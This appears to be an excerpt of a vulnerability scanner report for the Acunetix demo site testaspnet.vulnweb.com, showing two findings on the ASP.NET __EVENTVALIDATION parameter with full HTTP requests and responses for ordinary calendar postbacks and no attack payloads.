Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8494&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDApIifNNsIZGRk9CTFLsqFcJJeAzpJfE3IWAxvuY4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLJyqi9CQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlweRdQXh0Y8Vp7VaEnwlAMaNAGQLQw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:31 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDApIifNNsIZGRk9CTFLsqFcJJeAzpJfE3IWAxvuY4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLJyqi9CQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlweRdQXh0Y8Vp7VaEnwlAMaNAGQLQw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:White" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8341&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAcS9lvNoIZGRkYfJsCP37J%2FyuOz6VST%2BdVzFASAg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLk%2BK2uAgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAyv8LTM85P7pq7Zh2T6%2FxCq1F13C
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:28 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAcS9lvNoIZGRkYfJsCP37J/yuOz6VST+dVzFASAg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLk+K2uAgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAyv8LTM85P7pq7Zh2T6/xCq1F13C" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:White" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged 